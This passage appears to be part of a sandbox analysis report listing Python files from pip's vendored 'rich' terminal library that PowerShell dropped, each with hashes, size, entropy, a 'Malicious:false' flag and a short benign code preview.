                                                                                                                                                                                                            SHA-512:591865D005B3052F86CA7C7DAFFECDABB0A68E0F9B2665FA1BE7780651E9D89AF6F5A75801E47F561478E8AEADF814172CE317ABF5051932B580889115B1B66B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import NamedTuple...class Region(NamedTuple):. """Defines a rectangular region of the screen.""".. x: int. y: int. width: int. height: int.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4436
                                                                                                                                                                                                            Entropy (8bit):4.393139498783415
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:2a3Spx4OoB4ZD8PRB4wp4jx4Lzc4DYGD6iCpx4zoB4QD8sRB40fdvA:Ipx4HB4ZmRB4+4jx4/c436iCpx4sB4Qq
                                                                                                                                                                                                            MD5:7466F56787526581415BDA763B06A92B
                                                                                                                                                                                                            SHA1:57A1823248EF087A1D3EBBDD3457E0F0B3BD8621
                                                                                                                                                                                                            SHA-256:78939B41EEBF739A548D133CE6C676AEB5B8EFF885F474F767C0EB8158EF3A5F
                                                                                                                                                                                                            SHA-512:6F22A13F68B63077740CCDB19A17CC55A728F0C885BE1FB1DC0492B1379AA1AFE05CC475200AF9DC893B016E1A6DD9A980300F9511626A25A5EBE3C11DE18273
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import inspect.from functools import partial.from typing import (. Any,. Callable,. Iterable,. List,. Optional,. Tuple,. Type,. TypeVar,. Union,. overload,.)..T = TypeVar("T")...Result = Iterable[Union[Any, Tuple[Any], Tuple[str, Any], Tuple[str, Any, Any]]].RichReprResult = Result...class ReprError(Exception):. """An error occurred when attempting to build a repr."""...@overload.def auto(cls: Optional[Type[T]]) -> Type[T]:. ......@overload.def auto(*, angular: bool = False) -> Callable[[Type[T]], Type[T]]:. ......def auto(. cls: Optional[Type[T]] = None, *, angular: Optional[bool] = None.) -> Union[Type[T], Callable[[Type[T]], Type[T]]]:. """Class decorator to create __repr__ from __rich_repr__""".. def do_replace(cls: Type[T], angular: Optional[bool] = None) -> Type[T]:. def auto_repr(self: T) -> str:. """Create repr string from __rich_repr__""". repr_str: List[str] = []. append = repr_str.append.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4773
                                                                                                                                                                                                            Entropy (8bit):4.403822690292338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:L1WbbQoj5Y92PUYJzcDgUj3FAPI7pnhyAoEf/CkfutfOJw+kSd3nt:LIbUoNYCUwKJJ9BTf/7futfOJDkSd3nt
                                                                                                                                                                                                            MD5:A2325EF85AD5FDD2DAD8786C12A4F47D
                                                                                                                                                                                                            SHA1:0CFE3366842F1A79B4FA38E49262947AA5B0CB69
                                                                                                                                                                                                            SHA-256:57A016234C026FA0C1D2BBCDF7AEC544C950ADD946EC7A1975F1001F2786F023
                                                                                                                                                                                                            SHA-512:08FE3E532546868C365A5C1B515A738A669A9F846807440A650977414445529C1EDE9A0080620FB1D79440890E0156921560F100EDF7273FCA4F4A4424F88259
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union..from .align import AlignMethod.from .cells import cell_len, set_cell_size.from .console import Console, ConsoleOptions, RenderResult.from .jupyter import JupyterMixin.from .measure import Measurement.from .style import Style.from .text import Text...class Rule(JupyterMixin):. """A console renderable to draw a horizontal rule (line)... Args:. title (Union[str, Text], optional): Text to render in the rule. Defaults to "".. characters (str, optional): Character(s) used to draw the line. Defaults to ".".. style (StyleType, optional): Style of Rule. Defaults to "rule.line".. end (str, optional): Character at end of Rule. defaults to "\\\\n". align (str, optional): How to align the title, one of "left", "center", or "right". Defaults to "center".. """.. def __init__(. self,. title: Union[str, Text] = "",. *,. characters: str = ".",. style: Union[str, Style] = "rule.line",. e
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2843
                                                                                                                                                                                                            Entropy (8bit):4.631212873775702
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:QX+L4K8oUk7JnJTHrB0jiNxs2bNhggq3Ktwk8XiKqE6PBrtv6fJOBlfT:xQkjTLi2/hikGXqE6PBrtAJOBtT
                                                                                                                                                                                                            MD5:E079470D462D4CF31E883874C56FFD10
                                                                                                                                                                                                            SHA1:5AEC0581ED1C64D49146D94301C0E01D2ECC5000
                                                                                                                                                                                                            SHA-256:4CC514F2AA35EED872A9008FAA30CB62983F514D64E6A55DF96C2226F9C955AB
                                                                                                                                                                                                            SHA-512:90B59FE3F882BAF6FFA1753698C629F40493A2215DDF3431BEDE92082932451AC38B429BB0855E8A7F276944DF33EAABDDDB72C39CADA5BA5A5E5E96DA1BB40A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from collections.abc import Mapping.from typing import TYPE_CHECKING, Any, Optional, Tuple..from .highlighter import ReprHighlighter.from .panel import Panel.from .pretty import Pretty.from .table import Table.from .text import Text, TextType..if TYPE_CHECKING:. from .console import ConsoleRenderable...def render_scope(. scope: "Mapping[str, Any]",. *,. title: Optional[TextType] = None,. sort_keys: bool = True,. indent_guides: bool = False,. max_length: Optional[int] = None,. max_string: Optional[int] = None,.) -> "ConsoleRenderable":. """Render python variables in a given scope... Args:. scope (Mapping): A mapping containing variable names and values.. title (str, optional): Optional title. Defaults to None.. sort_keys (bool, optional): Enable sorting of items. Defaults to True.. indent_guides (bool, optional): Enable indentation guides. Defaults to False.. max_length (int, optional): Maximum length of containers before
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1591
                                                                                                                                                                                                            Entropy (8bit):4.432222648559961
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:KxZdUujxkkZSHlstWfVNh+rbIsBuS2N/iK:KVrjxkkZSHlmA/+/Isb2N/
                                                                                                                                                                                                            MD5:0C196D1D4B558FD036F7FFE1B58D065C
                                                                                                                                                                                                            SHA1:4F0802D8391D8C1E0397768DB38BB9E56CBAC613
                                                                                                                                                                                                            SHA-256:628791784494871EF882BA9BD264926FD960861CAC5A6147621B1B3154235CEF
                                                                                                                                                                                                            SHA-512:28DC7A790717612D6F570BF0AEB21E79D313D98ADF848AAB6720B42F7438453B38496836ABCEEE501F6DF7BF285B345E760995D38ABF0F9749368D953FDA11EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Optional, TYPE_CHECKING..from .segment import Segment.from .style import StyleType.from ._loop import loop_last...if TYPE_CHECKING:. from .console import (. Console,. ConsoleOptions,. RenderResult,. RenderableType,. Group,. )...class Screen:. """A renderable that fills the terminal screen and crops excess... Args:. renderable (RenderableType): Child renderable.. style (StyleType, optional): Optional background style. Defaults to None.. """.. renderable: "RenderableType".. def __init__(. self,. *renderables: "RenderableType",. style: Optional[StyleType] = None,. application_mode: bool = False,. ) -> None:. from pip._vendor.rich.console import Group.. self.renderable = Group(*renderables). self.style = style. self.application_mode = application_mode.. def __rich_console__(. self, console: "Console", options: "ConsoleOptions". ) -
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):24224
                                                                                                                                                                                                            Entropy (8bit):4.22401722100693
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:axns/h+ppNppWegjUVEQRppxRp8RpQw+9zQqLAigHZKdUOez:Qns/h+ppNpIjQEkppPpQpQw+9zQqEigb
                                                                                                                                                                                                            MD5:8620A9F7EF316E866A0E6E8CA730ACCA
                                                                                                                                                                                                            SHA1:BE168CC8EC7950D2755B1B3CE62791B5E07791BB
                                                                                                                                                                                                            SHA-256:E97757D0C7CBD7CB5409A5160D69DC22AC74C29AB71A26AACE160FEFBF49BD10
                                                                                                                                                                                                            SHA-512:C7C587558B8C74DA84CCF8924DC8721AD68962B58EA171E0A86629E769C05FB373DCDECC375C63948DBDEC5B2487E2E2093E90FF07A6F4AA3EFABD5E40121A32
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from enum import IntEnum.from functools import lru_cache.from itertools import filterfalse.from logging import getLogger.from operator import attrgetter.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Sequence,. Tuple,. Type,. Union,.)..from .cells import (. _is_single_cell_widths,. cached_cell_len,. cell_len,. get_character_cell_size,. set_cell_size,.).from .repr import Result, rich_repr.from .style import Style..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderResult..log = getLogger("rich")...class ControlType(IntEnum):. """Non-printable control codes which typically translate to ANSI codes.""".. BELL = 1. CARRIAGE_RETURN = 2. HOME = 3. CLEAR = 4. SHOW_CURSOR = 5. HIDE_CURSOR = 6. ENABLE_ALT_SCREEN = 7. DISABLE_ALT_SCREEN = 8. CURSOR_UP = 9. CURSOR_DOWN = 10. CURSOR_FORWARD = 11. CURSOR_BACKWARD = 12. CURSOR_MOVE_TO_COLUMN = 13. CU
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4374
                                                                                                                                                                                                            Entropy (8bit):4.356211547454224
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:WG1E6DmjmE2jtVPVUmg9/prjfUBxlyWs6:WGOX6tNWXoH8WZ
                                                                                                                                                                                                            MD5:1D7A89232F64CF473208A980BF81433E
                                                                                                                                                                                                            SHA1:6129950D1893482FDB1935ED677ABDE04EBF1287
                                                                                                                                                                                                            SHA-256:EDBF0C0A5792E1F6B8E875F403317DF337EEE9933A7C02F45206333CEA1A905E
                                                                                                                                                                                                            SHA-512:A469F8C260BC3D69361AFA999BB5843100D7534ADFD38F3B2E9A21E69C12A589B45EAEA3588C8F3CAA33BF8C6BA5C0232A03A2C694D5DAB40EF2A54EEAB0C0AE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import cast, List, Optional, TYPE_CHECKING, Union..from ._spinners import SPINNERS.from .measure import Measurement.from .table import Table.from .text import Text..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderResult, RenderableType. from .style import StyleType...class Spinner:. def __init__(. self,. name: str,. text: "RenderableType" = "",. *,. style: Optional["StyleType"] = None,. speed: float = 1.0,. ) -> None:. """A spinner animation... Args:. name (str): Name of spinner (run python -m rich.spinner).. text (RenderableType, optional): A renderable to display at the right of the spinner (str or Text typically). Defaults to "".. style (StyleType, optional): Style for spinner animation. Defaults to None.. speed (float, optional): Speed factor for animation. Defaults to 1.0... Raises:. KeyError: If name isn't one of the
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4425
                                                                                                                                                                                                            Entropy (8bit):4.403304241123254
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:tcr/I55j7FHIRuKyVyAlPVYNmW2Lowu5wYW:tcO5llVyDmW2Lowu5wYW
                                                                                                                                                                                                            MD5:3D1772B4ED0F97930A5ABD7E676948F2
                                                                                                                                                                                                            SHA1:A8BEDFFABAF6C3502EF2940233EB50F8454205C6
                                                                                                                                                                                                            SHA-256:809B085C865E4A8DEEACECB14548ECE95AE15F9099AC0D0DC4843E7718429F0A
                                                                                                                                                                                                            SHA-512:825177985038CE0CBB8AD2AE0C10DC342AFD3BB9B1D0F4814B008F01A0B4E7E2C70970F90944C7FAF4EF09CF27BC3B7EA81B6253D570B3AE4B76B7480818EA46
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import TracebackType.from typing import Optional, Type..from .console import Console, RenderableType.from .jupyter import JupyterMixin.from .live import Live.from .spinner import Spinner.from .style import StyleType...class Status(JupyterMixin):. """Displays a status indicator with a 'spinner' animation... Args:. status (RenderableType): A status renderable (str or Text typically).. console (Console, optional): Console instance to use, or None for global console. Defaults to None.. spinner (str, optional): Name of spinner animation (see python -m rich.spinner). Defaults to "dots".. spinner_style (StyleType, optional): Style of spinner. Defaults to "status.spinner".. speed (float, optional): Speed factor for spinner animation. Defaults to 1.0.. refresh_per_second (float, optional): Number of refreshes per second. Defaults to 12.5.. """.. def __init__(. self,. status: RenderableType,. *,. console
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26332
                                                                                                                                                                                                            Entropy (8bit):4.335333486380808
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:kfphCygDI8ZPG8n5kYPehr/8JAp9rMbIBzeE8zo/z88aXs7n:kjCygTPFqgcrJBzeu/NaXs7n
                                                                                                                                                                                                            MD5:440B84927D4797F38C7ED4C90E596DAF
                                                                                                                                                                                                            SHA1:632419E53DD11E13A0403851EBE007B8F622D45D
                                                                                                                                                                                                            SHA-256:A1D05B025AE07446C08FBA66B4F6D0B5624D4BCBA9C8D861CBEF8AB3A2B000A9
                                                                                                                                                                                                            SHA-512:4A649C41FA6435C9D14EC25FF20C9C5B8E5E3C469679BD555DEF0716728D9BC743918E0D77C47AFA331FC6072ECECAED4C44BAF9187883858973DAA16690683D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys.from functools import lru_cache.from marshal import dumps, loads.from random import randint.from typing import Any, Dict, Iterable, List, Optional, Type, Union, cast..from . import errors.from .color import Color, ColorParseError, ColorSystem, blend_rgb.from .repr import Result, rich_repr.from .terminal_theme import DEFAULT_TERMINAL_THEME, TerminalTheme..# Style instances and style definitions are often interchangeable.StyleType = Union[str, "Style"]...class _Bit:. """A descriptor to get/set a style attribute bit.""".. __slots__ = ["bit"].. def __init__(self, bit_no: int) -> None:. self.bit = 1 << bit_no.. def __get__(self, obj: "Style", objtype: Type["Style"]) -> Optional[bool]:. if obj._set_attributes & self.bit:. return obj._attributes & self.bit != 0. return None...@rich_repr.class Style:. """A terminal style... A terminal style consists of a color (`color`), a background color (`bgcolor`), and a number of attributes, suc
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1258
                                                                                                                                                                                                            Entropy (8bit):4.561007222082858
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1REOWq31WH2St1AMGjTFMArHG2UCVNjhjPNLT6FCVNlpzpBlpLjpuGv:Uq31WH2St4jTFMIHG2fVNlxTLVNlPBf1
                                                                                                                                                                                                            MD5:9525EC563099344E538095DFDB156A62
                                                                                                                                                                                                            SHA1:6FD170BA37F8246B0F64BA21357410459044160C
                                                                                                                                                                                                            SHA-256:799367CC6AC8E248BFE78A606373A3D13FB1DE5C5D5D3621E3FAF20C1DB8C015
                                                                                                                                                                                                            SHA-512:D5DC8BB7B27D2C39F06AA07659AE3A04E661CF4E4A8DDFEF015506427B5DF456FD9D46B2848E6594762B85332A46362B48EBACB39AB39F9795B4C22CC1831D07
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import TYPE_CHECKING..from .measure import Measurement.from .segment import Segment.from .style import StyleType..if TYPE_CHECKING:. from .console import Console, ConsoleOptions, RenderResult, RenderableType...class Styled:. """Apply a style to a renderable... Args:. renderable (RenderableType): Any renderable.. style (StyleType): A style to apply across the entire renderable.. """.. def __init__(self, renderable: "RenderableType", style: "StyleType") -> None:. self.renderable = renderable. self.style = style.. def __rich_console__(. self, console: "Console", options: "ConsoleOptions". ) -> "RenderResult":. style = console.get_style(self.style). rendered_segments = console.render(self.renderable, options). segments = Segment.apply_style(rendered_segments, style). return segments.. def __rich_measure__(. self, console: "Console", options: "ConsoleOptions". ) -> Measurement:.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):34995
                                                                                                                                                                                                            Entropy (8bit):4.405355848514269
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:A3JZ9gsESviCaI5XxdCX0TXl6zzXoQ/ARl:Ad4Ck0TX8zjf/W
                                                                                                                                                                                                            MD5:10935788D66BED71F88DB4FDF5483E4C
                                                                                                                                                                                                            SHA1:B1CB2A6AA7C6D799B270A1E5206F4CA08CEBE81C
                                                                                                                                                                                                            SHA-256:5B5C6D741035F8454FFB0798A1F297BAC525579CE08423AFD6758C1C77CD9A26
                                                                                                                                                                                                            SHA-512:AAC323058B57A964BD88C61EA6BFDA7567FA73EF8EB4A27E3E1F6F5EDA18AD7BAAAECF30B1332DB44A6CF1BBA6490C7B91741EB088A8611D70A435535E57F23D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os.path.import platform.import re.import sys.import textwrap.from abc import ABC, abstractmethod.from typing import (. Any,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Sequence,. Set,. Tuple,. Type,. Union,.)..from pip._vendor.pygments.lexer import Lexer.from pip._vendor.pygments.lexers import get_lexer_by_name, guess_lexer_for_filename.from pip._vendor.pygments.style import Style as PygmentsStyle.from pip._vendor.pygments.styles import get_style_by_name.from pip._vendor.pygments.token import (. Comment,. Error,. Generic,. Keyword,. Name,. Number,. Operator,. String,. Token,. Whitespace,.).from pip._vendor.pygments.util import ClassNotFound..from pip._vendor.rich.containers import Lines.from pip._vendor.rich.padding import Padding, PaddingDimensions..from ._loop import loop_first.from .cells import cell_len.from .color import Color, blend_rgb.from .console import Console, ConsoleOptions, JustifyMethod, RenderRe
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39684
                                                                                                                                                                                                            Entropy (8bit):4.335845620392849
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ooMviGrHA4IGCajB8/LteBH+j67RasODd:ooEikVDBocejX
                                                                                                                                                                                                            MD5:7AAF0F314ED2D88485CB36C3DD66904D
                                                                                                                                                                                                            SHA1:C2391AEB22FAFCCCC9F3E756AEE4847581E87DA9
                                                                                                                                                                                                            SHA-256:F96CDEB0BF9524AB1A883537BB2733A49307CBA5426927B0058270C7C46E748F
                                                                                                                                                                                                            SHA-512:2AF41864DB4ED0D05B5FB06ACEAF2370D6A8E7CEC3A9BECFC416962DC045113A9F22561037D43AA32D62409F10F09A6CA03D23E071D7A7129403BA3D51520597
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from dataclasses import dataclass, field, replace.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Sequence,. Tuple,. Union,.)..from . import box, errors.from ._loop import loop_first_last, loop_last.from ._pick import pick_bool.from ._ratio import ratio_distribute, ratio_reduce.from .align import VerticalAlignMethod.from .jupyter import JupyterMixin.from .measure import Measurement.from .padding import Padding, PaddingDimensions.from .protocol import is_renderable.from .segment import Segment.from .style import Style, StyleType.from .text import Text, TextType..if TYPE_CHECKING:. from .console import (. Console,. ConsoleOptions,. JustifyMethod,. OverflowMethod,. RenderableType,. RenderResult,. )...@dataclass.class Column:. """Defines a column within a ~Table... Args:. title (Union[str, Text], optional): The title of the table rendered at the top. Defaults to No
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3370
                                                                                                                                                                                                            Entropy (8bit):4.21397722226693
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:QKDQOUVxbxUMbS64xM3Swkwf5Iz+FvWHvix:EnbS64+TkwxIz+FvCvix
                                                                                                                                                                                                            MD5:26697A919BF9B0EED369A89647145303
                                                                                                                                                                                                            SHA1:006B559781A41F7F79C70AC0BDEDAD9F603C4D13
                                                                                                                                                                                                            SHA-256:D63E7EB9F25F9EF940A3942C8BF0026625C39B0317CEA826141C8E6D3F7EC896
                                                                                                                                                                                                            SHA-512:827C24A259B44978564070EBDDE1C9BB770506B3BF7B7DCA692732F831F7A3EAE5117AA286A357711F0B5FF096BBA96E1F249E6D4F7FC0E20ADD35654472B034
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import List, Optional, Tuple..from .color_triplet import ColorTriplet.from .palette import Palette.._ColorTuple = Tuple[int, int, int]...class TerminalTheme:. """A color theme used when exporting console content... Args:. background (Tuple[int, int, int]): The background color.. foreground (Tuple[int, int, int]): The foreground (text) color.. normal (List[Tuple[int, int, int]]): A list of 8 normal intensity colors.. bright (List[Tuple[int, int, int]], optional): A list of 8 bright colors, or None. to repeat normal intensity. Defaults to None.. """.. def __init__(. self,. background: _ColorTuple,. foreground: _ColorTuple,. normal: List[_ColorTuple],. bright: Optional[List[_ColorTuple]] = None,. ) -> None:. self.background_color = ColorTriplet(*background). self.foreground_color = ColorTriplet(*foreground). self.ansi_colors = Palette(normal + (bright or normal))...DEF
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with very long lines (463)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):45686
                                                                                                                                                                                                            Entropy (8bit):4.283351729314861
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ykXL3u1OiAVBZBuBHLSWGDKkd6Tl6CxOJ7PTptkd1oMc4z6MfHwQYfk6:z7gMDKk8TeQdyqPpYfl
                                                                                                                                                                                                            MD5:9624C9A1AC8B69BBEBD1357450A652DB
                                                                                                                                                                                                            SHA1:4A07E1ADC52583879C15E48CDB8FD4F0CC4633A2
                                                                                                                                                                                                            SHA-256:6A77576B1596FF006F78C899669779BE2430B9C5A8ED23E8A5C33764241E3B47
                                                                                                                                                                                                            SHA-512:4FB47A6CD36BE76FCD9AF4DB8F76B43754BB09F3C2A89001202CF77BEE706D2502050F9137CB4A657918C289886776172D7EE99DC2B296F4F00CAB6FCB3B2ABE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import re.from functools import partial, reduce.from math import gcd.from operator import itemgetter.from typing import (. TYPE_CHECKING,. Any,. Callable,. Dict,. Iterable,. List,. NamedTuple,. Optional,. Tuple,. Union,.)..from ._loop import loop_last.from ._pick import pick_bool.from ._wrap import divide_line.from .align import AlignMethod.from .cells import cell_len, set_cell_size.from .containers import Lines.from .control import strip_control_codes.from .emoji import EmojiVariant.from .jupyter import JupyterMixin.from .measure import Measurement.from .segment import Segment.from .style import Style, StyleType..if TYPE_CHECKING: # pragma: no cover. from .console import Console, ConsoleOptions, JustifyMethod, OverflowMethod..DEFAULT_JUSTIFY: "JustifyMethod" = "default".DEFAULT_OVERFLOW: "OverflowMethod" = "fold"..._re_whitespace = re.compile(r"\s+$")..TextType = Union[str, "Text"]..GetStyleCallable = Callable[[str], Optional[StyleType]]...class Span(
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3627
                                                                                                                                                                                                            Entropy (8bit):4.440474712225699
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:7eT7UYRvzYXENGE6q/83X/xGXrkXGulzRKo5F1k3GulINGGNgosGmMAGulRlvHMA:yTHzJgA83PMSlBFUloNTmMalbs4lWnW
                                                                                                                                                                                                            MD5:9EBEF592CE4B417032DCF938109BFDBF
                                                                                                                                                                                                            SHA1:FE7C434B8DC0A5B3E5CD2384B1606A72D9198636
                                                                                                                                                                                                            SHA-256:18A36D4210C164A0330DA634BD0550405CDB734B967C57BA0895C0FACC93EF34
                                                                                                                                                                                                            SHA-512:C4F92C5615BFF10603076A6B06C022516636732BDD4509A2B46BD5E62F6FD031F7FD3EC9191F4B4D47BB9598DA0457AC7B782D76F6ED82ED77D8954D882136A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import configparser.from typing import Dict, List, IO, Mapping, Optional..from .default_styles import DEFAULT_STYLES.from .style import Style, StyleType...class Theme:. """A container for style information, used by :class:`~rich.console.Console`... Args:. styles (Dict[str, Style], optional): A mapping of style names on to styles. Defaults to None for a theme with no styles.. inherit (bool, optional): Inherit default styles. Defaults to True.. """.. styles: Dict[str, Style].. def __init__(. self, styles: Optional[Mapping[str, StyleType]] = None, inherit: bool = True. ):. self.styles = DEFAULT_STYLES.copy() if inherit else {}. if styles is not None:. self.styles.update(. {. name: style if isinstance(style, Style) else Style.parse(style). for name, style in styles.items(). }. ).. @property. def config(self) -> str:. """Get contents of
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):102
                                                                                                                                                                                                            Entropy (8bit):4.68197687803328
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:1LBzQf9jCMoQEldx4zv+GR+Q58v5gdpxaddx4zu:1LBzQl+MxG0BRT5+58pY7/
                                                                                                                                                                                                            MD5:579B6AB8DACC395E63FFF4800B1C6D3C
                                                                                                                                                                                                            SHA1:5962944738F3A08C35E5119F576C85EDFF8C58C0
                                                                                                                                                                                                            SHA-256:D318132E8CDF69B79B62D709B43742E50917E4855411ABE2A83509261E185459
                                                                                                                                                                                                            SHA-512:464487FBAF8C4C79DDE3280B5F4C5C80D7A7DB389FEB8EB9870241BE1B6C4971D03009349539571D3ACD93CB15572A2618AD388022E7809A70F3CC8C4E4A3C50
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from .default_styles import DEFAULT_STYLES.from .theme import Theme...DEFAULT = Theme(DEFAULT_STYLES).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26070
                                                                                                                                                                                                            Entropy (8bit):4.316909455630819
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:s8xJvSah/U4m+8jvKKJpcD2fmyDe/TfQ2GenU3jo2g3sFJld:s8xJvPL7/TfB2/z
                                                                                                                                                                                                            MD5:C3B37C3DF21E56FFD5A844E21A9961DA
                                                                                                                                                                                                            SHA1:E093624AE4A5FF616525E9DDF71BBDC30E52D3DC
                                                                                                                                                                                                            SHA-256:E8B90682E0840312AFF2FF3198A7CC7983CF2755175041C3BF8EF6E93A3A1624
                                                                                                                                                                                                            SHA-512:A0D93A4263BC4984E1CA8BC40A8AB374D43A39748AF9966D9CD4E50956B510DD63E713885C6E263DC0DB02AF6ACE188EC9F32640F8D47447A0D1DE29AC81B3AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
